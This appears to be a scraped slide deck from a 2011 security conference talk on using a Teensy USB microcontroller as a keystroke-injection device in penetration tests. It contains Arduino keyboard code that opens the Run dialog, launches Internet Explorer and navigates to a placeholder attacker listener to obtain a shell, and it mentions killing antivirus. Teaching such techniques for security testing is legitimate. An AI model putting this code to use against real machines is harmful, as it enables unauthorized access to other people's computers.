際際滷

際際滷Share a Scribd company logo

Teensy Preso

W
Wardell Motley, NSA IAM\IEM

This document discusses security topics like the Certified Ethical Hacker (CEH) certification and the NSA Information Assurance Methodology. It also discusses USB-based microcontroller development systems and programmable USB keyboards that can be used for keystroke injection. The document provides code examples for using a Teensy device and Arduino software to program a keyboard for tasks like opening websites and entering URLs. It warns about limitations of this approach and recommends hand-coding instead of using automated tools. Contact information is provided at the end.

1 of 21
Teensy Preso
|EH (Certified Ethical Hacker) NSA-IAMIEM (NSA Information Assurance Methodology) Other Security Related Stuff: Contributor: The Ethical Hacker. Net Contributor:Hakin9 Magazine Contributor: Penetration Testing Execution Standard Information Security Mentors Project (Mentor)
David Crenshaw Irongeek Darren Kitchen Hak5 Robin Wood David Kennedy (ReLik) SET Toolkit http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke- dongle
USB-based microcontroller development system AVR Processor, 16 MHz Single push button programming Small Size Works with Mac OS X, Linux & Windows Flash Memory 32256
USB-based microcontroller development system AVR Processor, 20 MHz Single push button programming Small Size Works with Mac OS X, Linux & Windows Flash Memory 130048
Allows for keystroke programming Not dependent on U3 auto run Can provide you a shell and kill antivirus faster than you can! Cheap Economy is bad and you need to spend less! ($16 $24) Easily Implantable (More on This Later)
Teensy Device Teensy Loader Software Arduino Software Teensy Duino Software Serial Install Mini B USB Cable Computer Your Brain and some good ideas
Can be programmed in C or Arduino Language http://www.pjrc.com/teensy
Limited Scope Limited Attack Vectors You only get 5 hardened IP addresses Be Finished by Tomorrow!!!! Laughing CISOs What you not in yet?
Teensy Preso
Teensy Preso
SET + Metasploit Creates PDE File and Listener for you
Auto Generated Code Does things you probably dont need Do you really want to spend that time swimming through someone elses code? Dont be lazy
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now();
Keyboard.set_key1(KEY_BACKSPACE); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.println("iexplore.exe"); Keyboard.set_key1(KEY_ENTER); Keyboard.set_key1(0); delay(5000); Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key2(KEY_D); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.set_key2(0); Keyboard.println("http://YourIPAddressForyourlistener goes here");
Teensy Preso
Teensy Preso
Target needs to be logged in! Limited to the access rights of the logged on user! Lots of things can and sometimes do go wrong! If you try to drop shell right away you will be caught
Teensy Preso
LinkedIn: Wardell Motley Twitter: Infowarrior0 Email:infowarrior0@gmail.com Please Put BSides DFW 2011 in the Subject Line
Contact Information: Infowarrior0@gmail.com LinkedIn: Wardell Motley Twitter:Infowarrior0

More Related Content

Teensy Preso